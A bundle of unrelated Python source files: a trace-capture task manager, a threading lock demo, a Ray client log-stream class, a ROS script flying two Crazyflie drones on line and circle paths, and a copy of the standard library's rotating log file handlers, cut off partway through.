task.add_trace(trace_path)
# Reverse the list so they are in time order.
for task in reversed(self._pending_tasks):
task.add_trace(trace_path, more_trace=False)
print('CaptureManager: Task finished, ID %s' % task.id)
self._finished_tasks.append(task)
self._pending_tasks = []
def _should_split(self):
"""Determine if we should split the file."""
if self._split_interval > 0 and self._capture_start_time > 0:
if time.time() - self._capture_start_time >= self._split_interval:
return True
return False
def _has_running_tasks(self):
return bool(self._running_tasks)
def _find_trace_list_by_timestamps(self, start_time, stop_time):
"""Find the list of traces within the start/stop time period."""
result = []
# Find the first trace with start_time > task_start_time.
idx = bisect(self._trace_file_list, (start_time, 0.0, ''))
start_idx = idx - 1 if idx > 0 else 0
# Then iterate from the start to end, add all traces within specified time.
for trace_start_time, trace_stop_time, trace_path in \
self._trace_file_list[start_idx:]:
if trace_stop_time <= start_time:
continue
elif trace_start_time >= stop_time:
break
else:
result.append(trace_path)
return result
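# Note: self._trace_file_list is kept sorted by trace start time, so bisect()
# above locates the first candidate in O(log n); the loop then keeps every trace
# whose [start, stop) interval overlaps the requested [start_time, stop_time)
# window.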
def start_new_task(self, task_id, task_owner, task_host):
"""Start a new capture task."""
# Every new task must have a unique ID.
if self.get_task_by_id(task_id):
raise DuplicateTaskError('Duplicate task ID %s' % task_id)
task = CaptureTask(task_id, task_owner, task_host)
self._running_tasks.append(task)
self._task_id_map[task_id] = task
task.start()
print('CaptureManager: Start task, ID %s' % task_id)
def stop_task(self, task_id):
"""Stop the task with specified task id."""
task = self.get_task_by_id(task_id)
if task is None:
raise TaskNotFoundError('Cannot find task with ID %s' % task_id)
if task.is_stopped():
raise TaskStoppedError('Task already stopped.')
# Stopped task will be moved to pending list. Task in pending list will be
# moved to finished on the next capture split/stop.
task.stop()
try:
self._running_tasks.remove(task)
except ValueError:
raise TaskNotFoundError('Cannot find task in queue. ID %s' % task_id)
self._pending_tasks.append(task)
print('CaptureManager: Stop task (wait for last capture), ID %s' % task_id)
def get_finished_tasks(self):
return self._finished_tasks
def get_running_tasks(self):
return self._running_tasks
def get_pending_tasks(self):
return self._pending_tasks
def get_task_by_id(self, task_id):
return self._task_id_map.get(task_id, None)
def shutdown(self):
"""Shutdown the capture thread."""
for task in self._running_tasks:
task.stop()
self._shutdown = True
self._capture_thread.join()
self._controller.close()
self._save_tasks_to_disk()
def get_controller_model(self):
return self._controller.model
def get_capture_config(self):
"""Get capture config as dict."""
# Capture config is controller's config + split setting.
# TODO(liuta): should be converted to a generic config method.
config = {'Capture Split Interval': '%s seconds' % self._split_interval}
config.update(self._controller.get_capture_config())
return config
def _save_tasks_to_disk(self):
"""Save the tasks to persistent storage."""
# TODO(liuta): need to use cloud storage for better capture storage.
res = []
for task in self._finished_tasks:
res.append(task.to_dict())
try:
with open(DEFAULT_TASK_SAVE_PATH, 'wb') as f:
json.dump(res, f, indent=1)
print('%d tasks saved to %s.' % (len(res), DEFAULT_TASK_SAVE_PATH))
except IOError as ex:
print('Failed to save task: %s' % ex)
def _load_tasks_from_disk(self):
"""Load the task from disk."""
res = []
try:
with open(DEFAULT_TASK_SAVE_PATH, 'rb') as f:
res = json.load(f)
except IOError:
print('No saved task, starting fresh.')
for t in res:
task = CaptureTask.from_dict(t)
self._finished_tasks.append(task)
self._task_id_map[task.id] = task
class CaptureTaskException(Exception):
pass
class DuplicateTaskError(CaptureTaskException):
pass
class TaskNotFoundError(CaptureTaskException):
pass
class TaskStoppedError(CaptureTaskException):
pass
|
MyTheradClass_lock2.py
|
import threading
import time
konci2 = threading.Lock()
#lock = used to block a thread from executing before another thread has finished
#lock2 = changing where the release() method is called will change the output
def orang_pertama(konci2):
konci2.acquire()
print('person 1 is using the bathroom')
time.sleep(1)
print('person 1 is done')
# konci2.release()
def orang_kedua(konci2):
# konci2.acquire()
print('person 2 is using the bathroom')
konci2.release()
time.sleep(1)
print('person 2 is done')
t1 = threading.Thread(target=orang_pertama, args=(konci2, ))
t2 = threading.Thread(target=orang_kedua, args=(konci2, ))
t1.start()
t2.start()
t1.join()
t2.join()
|
logsclient.py
|
"""This file implements a threaded stream controller to return logs back from
the ray clientserver.
"""
import sys
import logging
import queue
import threading
import grpc
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
logger = logging.getLogger(__name__)
# TODO(barakmich): Running a logger in a logger causes loopback.
# The client logger needs its own root -- possibly this one.
# For the moment, let's just not propagate beyond this point.
logger.propagate = False
class LogstreamClient:
def __init__(self, channel: "grpc._channel.Channel"):
"""Initializes a thread-safe log stream over a Ray Client gRPC channel.
Args:
channel: connected gRPC channel
"""
self.channel = channel
self.request_queue = queue.Queue()
self.log_thread = self._start_logthread()
self.log_thread.start()
def _start_logthread(self) -> threading.Thread:
return threading.Thread(target=self._log_main, args=(), daemon=True)
def _log_main(self) -> None:
stub = ray_client_pb2_grpc.RayletLogStreamerStub(self.channel)
log_stream = stub.Logstream(iter(self.request_queue.get, None))
try:
for record in log_stream:
if record.level < 0:
self.stdstream(level=record.level, msg=record.msg)
self.log(level=record.level, msg=record.msg)
except grpc.RpcError as e:
if grpc.StatusCode.CANCELLED != e.code():
# Not just shutting down normally
logger.error(
f"Got Error from logger channel -- shutting down: {e}")
raise e
def log(self, level: int, msg: str):
"""Log the message from the log stream.
By default, calls logger.log but this can be overridden.
Args:
level: The loglevel of the received log message
msg: The content of the message
"""
logger.log(level=level, msg=msg)
def stdstream(self, level: int, msg: str):
"""Log the stdout/stderr entry from the log stream.
By default, calls print but this can be overridden.
Args:
level: The loglevel of the received log message
msg: The content of the message
"""
print_file = sys.stderr if level == -2 else sys.stdout
print(msg, file=print_file)
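# Note: negative levels mark raw std stream output forwarded by the server;
# as written here, level -2 is routed to sys.stderr and any other negative
# level (e.g. -1) to sys.stdout.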
def set_logstream_level(self, level: int):
logger.setLevel(level)
req = ray_client_pb2.LogSettingsRequest()
req.enabled = True
req.loglevel = level
self.request_queue.put(req)
def close(self) -> None:
self.request_queue.put(None)
if self.log_thread is not None:
self.log_thread.join()
def disable_logs(self) -> None:
req = ray_client_pb2.LogSettingsRequest()
req.enabled = False
self.request_queue.put(req)
|
circDemo.py
|
#!/usr/bin/env python
#Drone 1: Forward/backward; (0,-0.6,0.4) <-> (0,0.6,0.4)
#Drone 2: Circle, center(0,0,0.4) radius(0.6).
#Drone 2 stops + hovers when Drone 1 is near endpoints, (within 0.2?)
#D2: PLACE AT x=+r. THEN GOES TO y=+r
#D1: PLACE AT y=-r, THEN GOES TO y=+r
import rospy
import tf
from crazyflie_driver.msg import Position
from crazyflie_driver.msg import Hover
from crazyflie_driver.msg import GenericLogData
from std_msgs.msg import Empty
from crazyflie_driver.srv import UpdateParams
from threading import Thread
import math
cf2stop = False
cf1nextInteresect = []
cf1pos = [0,0,0,0]
cf2pos = [0,0,0,0]
cf1setpoint = [0,0,0,0]
maxERR = 1000
def callback_cf1pos(data):
global cf1pos
cf1pos[0] = data.values[0]
cf1pos[1] = data.values[1]
cf1pos[2] = data.values[2]
def callback_cf2pos(data):
global cf2pos
cf2pos[0] = data.values[0]
cf2pos[1] = data.values[1]
cf2pos[2] = data.values[2]
class Crazyflie:
def __init__(self, prefix):
self.prefix = prefix
worldFrame = rospy.get_param("~worldFrame", "/world")
self.rate = rospy.Rate(5)
rospy.wait_for_service(prefix + '/update_params')
rospy.loginfo("found update_params service")
self.update_params = rospy.ServiceProxy(prefix + '/update_params', UpdateParams)
self.setParam("kalman/resetEstimation", 1)
self.setParam("flightmode/posSet", 1)
self.pub = rospy.Publisher(prefix + "/cmd_setpoint", Position, queue_size=1)
self.msg = Position()
self.msg.header.seq = 0
self.msg.header.stamp = rospy.Time.now()
self.msg.header.frame_id = worldFrame
self.msg.x = 0
self.msg.y = 0
self.msg.z = 0
self.msg.yaw = 0
self.stop_pub = rospy.Publisher(prefix + "/cmd_stop", Empty, queue_size=1)
self.stop_msg = Empty()
def setParam(self, name, value):
rospy.set_param(self.prefix + "/" + name, value)
self.update_params([name])
def goToSetpoint(self, setpoint):
self.msg.x = setpoint[0]
self.msg.y = setpoint[1]
self.msg.z = setpoint[2]
self.msg.yaw = setpoint[3]
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.pub.publish(self.msg)
def dist(v1, v2):
return abs( (v1[0] - v2[0])**2 + (v1[1]-v2[1])**2 )**(0.5)
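# Note: dist() is the planar (x, y) Euclidean distance between two pose vectors;
# the z and yaw components are ignored.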
def ylineNext(height, r, step, steps):
x = 0
direct = 1
#step = 0 is intersect1, y=-r
#step = steps/2 is intersect2, y=+r
if step > steps/2:
direct = -1
step -= steps/2
y = -r+r*4*step/steps
y = y*direct
return [x, y, height, 0]
def getDirect(step, steps):
direct = 1
if step > steps/2:
direct = -1
return direct
def circNext(height, r, step, steps):
angle = 2*math.pi*step/steps
x = r*math.cos(angle)
y = r*math.sin(angle)
yaw = angle
return [x, y, height, yaw]
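# Note: circNext() parameterises a circle of radius r at the given height:
# step/steps sweeps the angle from 0 to 2*pi, so step=0 gives roughly (r, 0)
# and step=steps/4 gives roughly (0, r); yaw is set to the same sweep angle.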
def getError(actual, theoretical):
Err = [0,0,0,0]
for i in range(len(Err)):
Err[i] = actual[i] - theoretical[i]
Err[i] = int(Err[i]*1000)/1000.0
return (Err)
def getErrCircle(actual, theoretical):
guessPos = [0,0,0,0]
err = getError(actual, theoretical)
r = dist(err, [0,0,0,0])*2.0/3
for i in range(len(guessPos)):
guessPos[i] = (theoretical[i] + actual[i])/2
return [guessPos, r]
def distErr(errCircleA, errCircleB):
d = dist(errCircleA[0], errCircleB[0])
d = d - errCircleA[1] - errCircleB[1]
return max(0, d)
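# Note: getErrCircle() wraps the commanded and measured poses in a rough
# "uncertainty circle" (their midpoint plus a radius derived from the error),
# and distErr() returns the gap between two such circles, clamped at zero
# when they overlap.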
def cf2task(cf):
global cf2stop, cf1nextInteresect, cf2pos, cf1pos, maxERR, cf1setpoint
rate = rospy.Rate(5)
#TEST POS
cf2pos = [0,0,0,0]
cf2setpoint = []
#start setpoint: go to (0.6, 0, 0.4)
cf2setpoint = [0.6, 0, 0.4, 0]
cf2nextIntersect = [0, 0.6, 0.4, 0]
#Take off
#cf.goToSetpoint([0, 0, 0.4, 0])
radius = 0.6
currentStep = 0
divisions = 30
stay = False
ErrCirc2 = getErrCircle(cf2pos, cf2setpoint)
#FOR TESTING PURPOSES:
#CIRCLE STARTS AT x =+, THEN GOES TO y =+
for i in range(3000):
#print("internal/goal" + str(cf1pos) + "/[0,0,0,0]")
print ("Sleeping T2 (drone)")
rate.sleep()
for i in range(20):
cf2setpoint = circNext(cf2setpoint[2], radius, currentStep, divisions)
cf.goToSetpoint(cf2setpoint)
rate.sleep()
while(True):
ErrCirc2 = getErrCircle(cf2pos, cf2setpoint)
if cf2nextIntersect[1] > 0:
print("circle going to y++")
else:
print("circle going to y--")
error = dist(getError(cf2pos, cf2setpoint), [0,0,0,0])
print("**c2 error " + str(error) + " r= " + str(ErrCirc2[1]))
stay = False
#get nextIntersect, but skew it so if it is too close it will keep on moving
cf2nextIntersect[1] = -1*radius if divisions/4 < currentStep+divisions/20 < 3*divisions/4 else radius
if cf2stop and cf2nextIntersect[1] == cf1nextInteresect[1]:
d = distErr(ErrCirc2, [cf1nextInteresect, 0])
if (d < 0.1):
stay = True
d = dist(cf2pos, cf1pos)
print("distance between drones: " + str(d))
if d < 0.05:
print("CRASH PREVENTION")
cf2setpoint[2] = 0
if error > maxERR:
print("error is bad, circle will stay")
stay = True
if (stay):
cf.goToSetpoint(cf2setpoint) #stay at position
else:
cf2setpoint = circNext(cf2setpoint[2], radius, currentStep, divisions)
currentStep = (currentStep + 1 ) % divisions
cf.goToSetpoint(cf2setpoint)
#CIRCLE
rate.sleep()
return
def cf1task(cf):
global cf2stop, cf1nextInteresect, cf1pos, maxERR, cf1setpoint
rate = rospy.Rate(5)
cf1pos = [0,0,0,0]
#1=>going toward y=0.6, -1=>going toward y=-0.6
direction = 1
radius = 0.6
divisions = 80
currentStep = 0
cf1nextInteresect = [0,0.6,0.4,0]
stay = False
cf1setpoint = ylineNext(cf1nextInteresect[2], radius, currentStep, divisions)
ErrCirc1 = getErrCircle(cf1setpoint, cf1pos)
#FOR TESTING PURPOSES:
'''for i in range(3000):
#print("internal/goal" + str(cf1pos) + "/[0,0,0,0]")
print ("Sleeping T1 (drone)")
rate.sleep()'''
#take off
for i in range(20):
#print("internal/goal" + str(cf1pos) + "/[0,0,0.4,0]")
print(cf1pos)
rate.sleep()
for i in range(4000):
#print("internal/goal" + str(cf1pos) + "/[0,0,0.4,0]")
print(cf1pos)
currentStep = (currentStep + 1) % divisions
cf.goToSetpoint(cf1setpoint)
if (i % (divisions/4) == 0):
print("Dropping")
for k in range(30):
cf.goToSetpoint(cf1setpoint)
rate.sleep()
rate.sleep()
rate.sleep()
while(True):
ErrCirc1 = getErrCircle(cf1setpoint, cf1pos)
error = dist(getError(cf1pos, cf1setpoint), [0,0,0,0])
print("*c1 error " + str(error) + " r= " + str(ErrCirc1[1]))
stay = False
if (error > maxERR):
print("Error bad. line will stay")
stay = True
#print("internal/goal" + str(cf1pos) + "/" + str(cf1setpoint))
cf1setpoint = ylineNext(cf1nextInteresect[2], radius, currentStep, divisions)
direction = getDirect(currentStep, divisions)
if not stay:
currentStep = (currentStep + 1) % divisions
cf.goToSetpoint(cf1setpoint)
cf1nextInteresect[1] = direction*radius
if (direction == 1):
print("Line going to y+++")
else:
print("Line going to y---")
#find out internal position, set cf1pos
if ( distErr(ErrCirc1, [cf1nextInteresect, 0]) < 0.1):
cf2stop = True
print("cf2stop warn")
elif cf2stop:
cf1oldIntersect = cf1nextInteresect
cf1oldIntersect[1] *= -1
if distErr(ErrCirc1, [cf1nextInteresect, 0]) > 0.1:
cf2stop = False
rate.sleep()
return
def cf1taskFake(cf):
global cf2stop, cf1nextInteresect, cf1pos, maxERR, cf1setpoint
rate = rospy.Rate(5)
cf1pos = [0,0,0,0]
#1=>going toward y=0.6, -1=>going toward y=-0.6
direction = 1
radius = 0.6
divisions = 80
currentStep = 0
cf1nextInteresect = [0,0.6,0.4,0]
stay = False
cf1setpoint = ylineNext(cf1nextInteresect[2], radius, currentStep, divisions)
ErrCirc1 = getErrCircle(cf1setpoint, cf1setpoint)
#FOR TESTING PURPOSES:
for i in range(30):
#print("internal/goal" + str(cf1pos) + "/[0,0,0,0]")
print ("Sleeping T1 (drone)")
rate.sleep()
#take off
while(True):
ErrCirc1 = getErrCircle(cf1setpoint, cf1setpoint)
error = dist(getError(cf1setpoint, cf1setpoint), [0,0,0,0])
print("*c1 error " + str(error) + " r= " + str(ErrCirc1[1]))
stay = False
if (error > maxERR):
print("Error bad. line will stay")
stay = True
#print("internal/goal" + str(cf1pos) + "/" + str(cf1setpoint))
cf1setpoint = ylineNext(cf1nextInteresect[2], radius, currentStep, divisions)
direction = getDirect(currentStep, divisions)
if not stay:
currentStep = (currentStep + 1) % divisions
#cf.goToSetpoint(cf1setpoint)
cf1nextInteresect[1] = direction*radius
if (direction == 1):
print("Line going to y+++")
else:
print("Line going to y---")
#find out internal position, set cf1pos
if ( distErr(ErrCirc1, [cf1nextInteresect, 0]) < 0.1):
cf2stop = True
print("cf2stop warn")
elif cf2stop:
cf1oldIntersect = cf1nextInteresect
cf1oldIntersect[1] *= -1
if distErr(ErrCirc1, [cf1nextInteresect, 0]) > 0.1:
cf2stop = False
print("cf2 can go ")
rate.sleep()
return
def cf2taskFake(cf):
global cf2stop, cf1nextInteresect, cf2pos, cf1pos, maxERR, cf1setpoint
rate = rospy.Rate(5)
#TEST POS
cf2pos = [0,0,0,0]
cf2setpoint = []
#start setpoint: go to (0.6, 0, 0.4)
cf2setpoint = [0.6, 0, 0.4, 0]
cf2nextIntersect = [0, 0.6, 0.4, 0]
#Take off
#cf.goToSetpoint([0, 0, 0.4, 0])
radius = 0.6
currentStep = 0
divisions = 30
stay = False
ErrCirc2 = getErrCircle(cf2setpoint, cf2setpoint)
#FOR TESTING PURPOSES:
#CIRCLE STARTS AT x =+, THEN GOES TO y =+
for i in range(20):
print("Sleeping t2")
rate.sleep()
while(True):
ErrCirc2 = getErrCircle(cf2setpoint, cf2setpoint)
if cf2nextIntersect[1] > 0:
print("circle going to y++")
else:
print("circle going to y--")
error = dist(getError(cf2setpoint, cf2setpoint), [0,0,0,0])
stay = False
#get nextIntersect, but skew it so if it is too close it will keep on moving
cf2nextIntersect[1] = -1*radius if divisions/4 < currentStep+divisions/20 < 3*divisions/4 else radius
if cf2stop and cf2nextIntersect[1] == cf1nextInteresect[1]:
d = distErr(ErrCirc2, [cf1nextInteresect, 0])
if (d < 0.1):
stay = True
d = dist(cf2setpoint, cf1setpoint)
print("distance between drones: " + str(d))
if d < 0.05:
print("CRASH PREVENTION")
cf2setpoint[2] = 0
if error > maxERR:
print("error is bad, circle will stay")
stay = True
if (stay):
cf.goToSetpoint(cf2setpoint) #stay at position
else:
cf2setpoint = circNext(cf2setpoint[2], radius, currentStep, divisions)
currentStep = (currentStep + 1 ) % divisions
cf.goToSetpoint(cf2setpoint)
#CIRCLE
rate.sleep()
return
if __name__ == '__main__':
rospy.init_node('position', anonymous=True)
cf1 = Crazyflie("cf1")
cf2 = Crazyflie("cf2")
rospy.Subscriber("cf1/log1", GenericLogData, callback_cf1pos)
rospy.Subscriber("cf2/log2", GenericLogData, callback_cf2pos)
print("STARTING THREADS")
#t1 = Thread(target=cf1task, args=(cf1,))
#t2 = Thread(target=cf2task, args=(cf2,))
t1 = Thread(target=cf1taskFake, args=(cf1,))
t2 = Thread(target=cf2taskFake, args=(cf2,))
t1.start()
t2.start()
t1.join()
t2.join()
|
handlers.py
|
# Copyright 2001-2010 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python, and influenced by
Apache's log4j system.
Copyright (C) 2001-2010 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
try:
import codecs
except ImportError:
codecs = None
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=0):
"""
Use the specified filename for streamed logging
"""
if codecs is None:
encoding = None
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=0):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = "%s.%d" % (self.baseFilename, i)
dfn = "%s.%d" % (self.baseFilename, i + 1)
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.baseFilename + ".1"
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
self.mode = 'w'
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = _MIDNIGHT - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = t[6] # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
newRolloverAt = newRolloverAt - 3600
else: # DST bows out before next rollover, so we need to add an hour
newRolloverAt = newRolloverAt + 3600
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dfn = self.baseFilename + "." + time.strftime(self.suffix, timeTuple)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
self.mode = 'w'
self.stream = self._open()
currentTime = int(time.time())
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstNow = time.localtime(currentTime)[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
newRolloverAt = newRolloverAt - 3600
else: # DST bows out before next rollover, so we need to add an hour
newRolloverAt = newRolloverAt + 3600
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=0):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
if not os.path.exists(self.baseFilename):
self.dev, self.ino = -1, -1
else:
stat = os.stat(self.baseFilename)
self.dev, self.ino = stat[ST_DEV], stat[ST_INO]
def emit(self, record):
"""
Emit a record.
First check if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
if not os.path.exists(self.baseFilename):
stat = None
changed = 1
else:
stat = os.stat(self.baseFilename)
changed = (stat[ST_DEV] != self.dev) or (stat[ST_INO] != self.ino)
if changed and self.stream is not None:
self.stream.flush()
self.stream.close()
self.stream = self._open()
if stat is None:
stat = os.stat(self.baseFilename)
self.dev, self.ino = stat[ST_DEV], stat[ST_INO]
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
